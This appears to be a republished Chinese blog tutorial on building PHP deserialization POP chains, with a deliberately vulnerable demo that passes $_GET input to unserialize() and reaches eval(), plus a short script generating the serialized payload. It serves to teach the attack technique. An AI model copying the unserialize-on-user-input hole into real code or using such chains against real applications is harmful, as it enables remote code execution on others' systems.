构造注入链:POP
Posted zzjdbk
tags:
篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了构造注入链:POP相关的知识,希望对你有一定的参考价值。
1.POP链原理简介:
在反序列化中,我们能控制的数据就是对象中的属性值,所以在php反序列化中有一种
漏洞利用方法叫"面向属性编程",即POP( Property Oriented Programming)。
在反序列化漏洞利用中,最理想的情况就是漏洞能利用的点在那几个魔幻函数中,
而实际上往往是从这几个魔幻函数开始,逐步的跟进这个函数中调用的函数,直到找到可以利用的点。
试想一下,如果上面那个CTF题目的代码执行函数eval()函数不在__destruct这类
魔幻函数中,而是在一个普通的方法中,我们就没办法直接利用它执行代码了。
这个时候就需要构造一个链,链接到我们需要执行的函数eval()。
我们来模拟一个简单的场景
1 <?php
2 class OowoO
3 {
4 protected $obj;
5 function __destruct()
6 {
7 //$obj = new test1; 这里可以控制$obj为任意对象
8 $this->obj->a();
9 }
10 }
11
12 class test1{
13 function a(){
14 echo "123";
15 }
16 }
17
18 class test2{
19 private $data;
20 function a(){
21 eval($this->data);
22 }
23 }
24 unserialize($_GET[‘a‘]);
25 ?>
利用:
1 <script language="php">
2 class OowoO{
3 protected $obj;
4
5 public function __construct(){
6 $this->obj = new test2();
7 }
8 }
9 class test2{
10 private $data = "phpinfo();";
11 }
12 echo urlencode(serialize(new OowoO()));
13 </script>
结果:
值得注意的是,反序列化可以控制类的属性,无论private还是public。
但是这里有个坑,如果类中存在protected或者private属性的时候,序列化的时候会产生空
字节,所以记得urlencode一下,payload才会生效。
总的来说:如果魔幻函数中没有漏洞利用点,但是他调用了其他对象(意味着实例化了该对象)中的方法A,
由于上述demo5中我们传入的反序列化数据可以实例化任意对象,所以我们可以全局寻找一个和方法A同名的方法,然后逐个查看其他同名方法A中是否含有可利用的点。
以上是关于构造注入链:POP的主要内容,如果未能解决你的问题,请参考以下文章
ThinkPHP3.2.x (SQL注入&文件读取)反序列化POP链
借安恒月赛web pop对象注入+反序列化字符逃逸深究其逃逸原理